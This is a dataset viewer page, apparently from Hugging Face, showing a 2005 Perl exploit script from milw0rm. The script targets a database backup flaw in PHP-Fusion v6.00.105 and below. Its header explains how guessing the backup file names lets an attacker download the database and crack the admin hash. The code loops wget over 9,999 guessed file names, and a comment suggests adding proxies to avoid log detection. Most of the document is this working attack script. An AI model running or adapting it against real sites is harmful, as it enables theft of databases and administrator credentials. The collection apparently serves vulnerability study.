Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1068.txt80 linesDownload Raw Back to exploits
1 #!/usr/bin/perl

2 ######################################################

3 #  D A R K   A S S A S S I N S   C R E W   2 0 0 5   #

4 ######################################################

5 # Dark Assassins - http://dark-assassins.com/        #

6 # Visit us on IRC @ irc.tddirc.net #DarkAssassins    #

7 ######################################################

8 # phpfusiondb.pl; Version 0.1 22/06/05               #

9 # PHP-Fusion db backup proof-of-concept by Easyex    #

10 # Database backup vuln in v6.00.105 and below        #

11 ######################################################

12 # Description: When a db (database) backup is made   #

13 # it is saved in /administration/db_backups/ on 6.0  #

14 # and on 5.0 it is saved in /fusion_admin/db_backups/#

15 # The backup file can be saved in 2 formats: .sql or #

16 # .sql.gz and is hidden by a blank index.php file but#

17 # can be downloaded client-side, The filename is for #

18 # example : backup_2005-06-22_2208.sql.gz so what we #

19 # can do is generate 0001 to 9999 and request the    #

20 # file and download it. If a db file is found an     #

21 # attacker can get the admin hash and crack  it or   #

22 # retrieve other sensitive information from the db!  #

23 ######################################################

24

25 # 9999 requests to the host is alot, And would get noticed in the server log!

26 # If you re-coded your own script with proxy support you would be fine.

27 # You need to know the backup year-month-day to be able to find a backup file unless the server is set to automaticlly   

28 # backup the php-fusiondatabase.

29

30 my $wget='wget';

31

32 my $count='0';

33

34 my $target;

35

36 if (@ARGV < 4)

37{

38 print "\n";

39 print "Welcome to the PHP-Fusion db backup vulnerability\n";

40 print "Coded by Easyex from the Dark Assassins crew\n";

41 print "\n";

42 print "Usage: phpfusiondb.pl <host> <version> <file> <extension>\n";

43 print "Example: phpfusiondb.pl example.com 6 backup_2005-06-23_ .sql.gz\n";

44 print "\n";

45 exit();

46}

47

48 my $host = $ARGV[0];

49 my $ver = $ARGV[1];

50 my $file = $ARGV[2];

51 my $extension = $ARGV[3];

52

53 if ($ver eq "6") {

54       $dir='/administration/db_backups/'; # Directory path to the 6.X backup folder

55 }

56

57 if ($ver eq "5") {

58       $dir='/fusion_admin/db_backups/'; # Directory path to the 5.X backup folder

59}

60

61 print "\n";

62 print "Welcome to the PHP-Fusion db backup vulnerability\n";

63 print "Coded by Easyex from the Dark Assassins crew\n";

64 print "\n";

65

66 print "Host: $host\n";

67 print "Directory: $dir\n";

68 print "File: $file + 0001 to 9999\n";

69 print "Extension: $extension\n";

70 print "\n";

71 print "Attempting to find a db backup file on $host\n";

72

73 for($count=0;$count<9999;$count++) {

74

75    $target=$host.$dir.$file.sprintf("%04d", $count).$extension;

76

77    system("$wget $target");

78 }

79

80# milw0rm.com [2005-06-25]